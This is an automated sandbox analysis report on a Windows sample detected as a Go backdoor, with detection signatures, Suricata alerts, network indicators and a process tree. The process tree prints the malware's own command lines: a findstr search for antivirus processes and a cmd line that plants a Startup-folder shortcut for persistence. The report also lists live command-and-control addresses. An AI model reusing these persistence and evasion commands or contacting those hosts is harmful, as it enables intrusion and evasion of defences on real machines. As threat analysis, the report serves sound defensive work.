Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sV9ElC4fU4.exe

Overview

General Information

Sample name:sV9ElC4fU4.exe
renamed because original name is a hash value
Original sample name:bf53f19b542df72aacf589a049619bc7.exe
Analysis ID:1533857
MD5:bf53f19b542df72aacf589a049619bc7
SHA1:1fdd0458c805758732b118a3b98fcc12877f5f54
SHA256:c5c3401f71f4361ed454bbd96ea7cdd8a9132a655815e35e207dfff0ea690469
Tags:exeuser-abuse_ch
Infos:

Detection

GO Backdoor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found Tor onion address
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • sV9ElC4fU4.exe (PID: 5724 cmdline: "C:\Users\user\Desktop\sV9ElC4fU4.exe" MD5: BF53F19B542DF72AACF589A049619BC7)
    • cmd.exe (PID: 4452 cmdline: "C:\Windows\System32\cmd.exe" /c move Min Min.bat & Min.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6404 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4536 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 4936 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3528 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3532 cmdline: cmd /c md 353685 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6816 cmdline: findstr /V "WirelessNeilAspBringing" Actively MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6748 cmdline: cmd /c copy /b ..\Skirts D MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Soldiers.pif (PID: 4912 cmdline: Soldiers.pif D MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 3504 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url" & echo URL="C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Soldiers.pif (PID: 7096 cmdline: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • choice.exe (PID: 3580 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 2940 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ChameleonCraft.scr (PID: 4584 cmdline: "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr" "C:\Users\user\AppData\Local\DesignQuantum Innovations\q" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • ChameleonCraft.scr (PID: 3900 cmdline: "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Soldiers.pif PID: 7096JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    Process Memory Space: ChameleonCraft.scr PID: 3900JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" , ProcessId: 2940, ProcessName: wscript.exe
      Sigma detected: Execution of Suspicious File Type Extension
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Soldiers.pif D, CommandLine: Soldiers.pif D, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Min Min.bat & Min.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4452, ParentProcessName: cmd.exe, ProcessCommandLine: Soldiers.pif D, ProcessId: 4912, ProcessName: Soldiers.pif
      Sigma detected: SCR File Write Event
      Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif, ProcessId: 4912, TargetFilename: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
      Sigma detected: Suspicious Screensaver Binary File Creation
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif, ProcessId: 4912, TargetFilename: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" , ProcessId: 2940, ProcessName: wscript.exe

      Data Obfuscation

      barindex
      Sigma detected: Drops script at startup location
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 3504, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Min Min.bat & Min.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4452, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 3528, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-15T09:40:15.987244+020028555361A Network Trojan was detected192.168.2.84996294.103.85.11430202TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-15T09:40:15.985563+020028555391A Network Trojan was detected94.103.85.11430202192.168.2.849962TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: sV9ElC4fU4.exeReversingLabs: Detection: 44%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.9% probability
      Machine Learning detection for sample
      Source: sV9ElC4fU4.exeJoe Sandbox ML: detected
      Source: sV9ElC4fU4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: sV9ElC4fU4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_004062EB FindFirstFileW,FindClose,0_2_004062EB
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CB1
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_00944005
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_0094C2FF
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,22_2_0094494A
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_0094CD9F
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094CD14 FindFirstFileW,FindClose,22_2_0094CD14
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_0094F5D8
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_0094F735
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_0094FA36
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_00943CE2
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00A04005
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00A0C2FF
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0494A GetFileAttributesW,FindFirstFileW,FindClose,23_2_00A0494A
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_00A0CD9F
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0CD14 FindFirstFileW,FindClose,23_2_00A0CD14
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00A0F5D8
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00A0F735
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00A0FA36
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00A03CE2
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353685Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353685\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 94.103.85.114:30202 -> 192.168.2.8:49962
      Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.8:49962 -> 94.103.85.114:30202
      Found Tor onion address
      Source: Soldiers.pif, 00000016.00000002.2714367627.0000000001200000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
      Source: ChameleonCraft.scr, 00000017.00000002.2714308258.00000000014C0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
      Source: global trafficTCP traffic: 192.168.2.8:49962 -> 94.103.85.114:30202
      Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
      Source: Joe Sandbox ViewIP Address: 93.185.159.253 93.185.159.253
      Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
      Source: unknownDNS traffic detected: query: CFIXDPmIiBsstXCezGs.CFIXDPmIiBsstXCezGs replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.85.114
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009529BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,22_2_009529BA
      Source: global trafficDNS traffic detected: DNS query: CFIXDPmIiBsstXCezGs.CFIXDPmIiBsstXCezGs
